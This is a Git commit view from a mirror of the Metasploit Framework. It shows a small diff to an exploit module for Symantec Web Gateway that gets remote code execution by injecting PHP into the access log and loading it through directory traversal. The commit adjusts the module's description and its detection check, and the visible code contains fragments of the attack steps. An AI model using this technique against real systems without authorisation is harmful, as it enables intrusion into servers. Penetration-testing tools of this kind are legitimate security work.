infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix check

unstable
sinn3r 2012-05-28 00:51:46 -05:00
parent 96d70e5fb6
commit 34c93d8e44
1 changed files with 6 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
modules/exploits/linux/http/symantec_web_gateway_lfi.rb
View File

@ -19,8 +19,9 @@ class Metasploit3 < Msf::Exploit::Remote
This module exploits a vulnerability found in Symantec Web Gateway's HTTP
service. By injecting PHP code in the access log, it is possible to load it
with a directory traversal flaw, which allows remote code execution under the
context of 'apache'. Please note that it may take a few minutes to get a
shell back.
context of 'apache'. Please note that it may take up to several minutes to
retrieve access_log, which is about the amount of time required to see a shell
back.
},
'License' => MSF_LICENSE,
'Author' =>
@ -63,8 +64,8 @@ class Metasploit3 < Msf::Exploit::Remote
'uri' => '/spywall/login.php'
})
if res and res.body =~ /Symantec Web Gateway/ and res.body =~ /Version 5\.0\.2\.\d/
return Exploit::CheckCode::Vulnerable
if res and res.body =~ /\<title\>Symantec Web Gateway\<\/title\>/
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Safe
end
@ -86,6 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil, nil, nil, 1)
# Use the directory traversal to load the PHP code
# access_log takes a long time to retrieve
print_status("#{peer} - Loading PHP code..")
send_request_raw({
'method' => 'GET',